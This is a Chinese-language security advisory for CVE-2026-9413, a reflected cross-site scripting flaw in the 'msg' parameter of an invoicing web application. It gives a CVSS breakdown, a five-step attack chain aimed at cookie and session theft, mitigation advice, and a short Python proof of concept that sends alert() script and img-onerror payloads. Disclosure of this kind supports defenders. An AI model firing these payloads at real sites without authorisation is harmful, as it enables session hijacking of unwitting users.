CVE-2026-9413 CVSS 4.3 中危

CVE-2026-9413: SourceCodester发票系统XSS漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9413

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

SourceCodester Indian Invoicing System

漏洞概述

SourceCodester Indian Invoicing System 1.0版本存在跨站脚本攻击（XSS）漏洞。该漏洞源于/Invoicing/category.php文件中对参数msg缺乏有效过滤，允许攻击者注入恶意脚本。攻击者无需认证即可远程发起攻击，诱导受害者交互后可执行任意JavaScript代码，窃取用户敏感信息或进行会话劫持。

技术细节

该漏洞的技术根源在于SourceCodester Indian Invoicing System 1.0中/Invoicing/category.php文件对msg参数的处理逻辑存在缺陷。应用程序直接将用户可控的msg参数值反射到HTTP响应中，且未进行HTML实体编码。攻击者可构造包含恶意载荷（如<img src=x onerror=alert(1)>）的请求发送至服务器。由于CVSS向量中UI:R（需用户交互），攻击者需通过钓鱼邮件或即时通讯诱导受害者访问该恶意链接。一旦受害者访问，恶意脚本即在其浏览器中解析执行，进而窃取Session ID、篡改页面数据或执行钓鱼攻击，严重威胁用户账户安全。

攻击链分析

STEP 1

侦察

攻击者识别目标系统正在使用SourceCodester Indian Invoicing System 1.0版本。

STEP 2

制作

攻击者构造包含恶意JavaScript代码的URL，将Payload注入到msg参数中。

STEP 3

传递

攻击者通过网络钓鱼、社交媒体或邮件诱导受害者点击恶意链接。

STEP 4

利用

受害者访问链接，服务器未过滤直接返回恶意脚本，受害者浏览器解析并执行代码。

STEP 5

达成目标

攻击者利用执行权限窃取Cookie、Session信息或重定向用户至恶意网站。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-9413
# Vulnerable File: /Invoicing/category.php
# Vulnerable Parameter: msg

import requests

target_url = "http://example.com/Invoicing/category.php"
payload = "<script>alert('CVE-2026-9413');</script>"

# Inject payload into the 'msg' parameter
params = {
    "msg": payload
}

try:
    response = requests.get(target_url, params=params, timeout=5)

    # Check if the payload is reflected unescaped in the response
    if payload in response.text:
        print("[+] Vulnerability confirmed! XSS payload executed successfully.")
    else:
        print("[-] Vulnerability not detected or payload was encoded.")
except Exception as e:
    print(f"Error: {e}")

影响范围

SourceCodester Indian Invoicing System 1.0

防御指南

临时缓解措施

建议开发者立即审查/Invoicing/category.php文件，对传入的'msg'参数使用htmlspecialchars()等函数进行转义处理。在官方补丁发布前，管理员可通过部署Web应用防火墙（WAF）拦截包含常见XSS特征（如<script>, <img onerror>等）的恶意请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9413
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9413
3 Details https://www.cvedetails.com/cve/CVE-2026-9413/
4 VulDB https://vuldb.com/cve/CVE-2026-9413
5 Link https://gist.github.com/c4ttr4ck/cb6a07bc54600a14de2676d8b96c3026
6 Link https://vuldb.com/submit/813609
7 Link https://vuldb.com/vuln/365394
8 Link https://vuldb.com/vuln/365394/cti
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表